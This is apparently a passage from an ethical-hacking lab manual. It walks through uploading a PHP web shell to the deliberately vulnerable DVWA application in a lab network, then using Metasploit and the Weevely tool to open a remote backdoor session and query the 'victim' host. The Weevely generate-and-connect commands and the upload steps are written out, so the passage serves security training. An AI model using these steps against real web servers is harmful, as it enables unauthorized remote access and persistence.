107. Switch to the Mozilla Firefox window where the DVWA website is
open. Open a new tab,
type http://10.10.10.16:8080/dvwa/hackable/uploads/shell.php into
the address bar and press Enter to execute the uploaded payload.
108. Switch back to the Terminal window and observe that
a Meterpreter session has successfully been established with the victim
system.
109. In the meterpreter command line, type sysinfo and press Enter to
view the system details of the victim machine.
110. This concludes the demonstration of how to exploit a file upload
vulnerability at different security levels.

111. Close all open windows and document all the acquired information.

Task 8: Gain Backdoor Access via a Web Shell using Weevely


Gaining backdoor access refers to entering a website in a stealthy way. These
Backdoors are often installed via some unvalidated uploads. This vulnerability allows
you to upload harmful files to the target web server. Websites that are developed using
PHP are often susceptible to this kind of attack.

A professional ethical hacker or pen tester can use tools such as Weevely to gain
backdoor access to a website without being traced. Weevely is used to develop a
backdoor shell and upload it to a target server in order to gain remote shell access. This
tool also helps in performing administrative tasks, maintaining persistence, and
spreading backdoors across the target network.
Here, we will gain backdoor access via a web shell using Weevely.

1. On the Parrot Security machine, click the MATE Terminal icon at the
top of Desktop to open a Terminal window.

2. A Parrot Terminal window appears. In the terminal window, type sudo


su and press Enter to run the programs as a root user.

If a Question pop-up window appears, asking for you to update the


machine, click No to close the window.
3. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.


4. Now, type cd and press Enter to jump to the root directory.
5. In the Terminal window; type weevely generate (Password) (File
Path) (here, the password is toor, and the file path
is /home/attacker/Desktop/shell.php) and press Enter to generate a shell
file.

Weevely encodes the payload with a key phrase so that no one else can use
it to access the target system.
6. The shell file (shell.php) is generated at the
location /home/attacker/Desktop, and it is encoded with the password
(toor). Minimize the terminal window.
7. Click the Firefox icon from the top section of Desktop,
type http://10.10.10.16:8080/dvwa/login.php. Into the address bar and
press Enter.

8. The DVWA login page appears; enter


the Username and Password as admin and password. Click
the Login button.

If a Would you like Firefox to save this login notification appears at the
top of the browser window, click Don’t Save.
9. The Welcome to Damn Vulnerable Web Application! Page appears.
Click DVWA Security in the left pane to view the DVWA security level.

10. Change the Security Level from impossible to low by


selecting Low from the drop-down list and clicking the Submit button, as
shown in the screenshot.
11. Click the File Upload option from the left pane.

12. The Vulnerability: File Upload page appears. Click


the Browse… button to upload a file.
13. The File Upload window appears; navigate to the Desktop location,
select the payload file shell.php, and click Open.
14. Observe that the selected file (shell.php) appears to the right of
the Browse… button.

15. Now, click the Upload button to upload the file to the database.
16. You will see a message that the file has successfully been uploaded, with
the location of the file. Note the location of the file and minimize the browser
window.
17. Switch back to the Terminal window, type weevely
http://10.10.10.16:8080/dvwa/hackable/uploads/shell.php
[Password] (The password that you have provided in Step#2), and
press Enter. This command establishes a connection with the payload and
interacts with the target.

Here, the password is toor.


18. You can observe that a session has successfully been established with
the victim system.
19. Now, type whoami and press Enter to view the system details of the
victim machine.

20. The result appears, displaying the running system privileges and the
present working directory, as shown in the screenshot.
21. Now, type ipconfig and press Enter to view the IP configuration of the
victim machine.

22. The result appears, displaying the victim machine’s IP address, default
gateway, Ipv6 address, and other information.
23. This concludes the demonstration of how to gain backdoor access via a
web shell using Weevely.

24. Close all open windows and document all the acquired information.

You might also like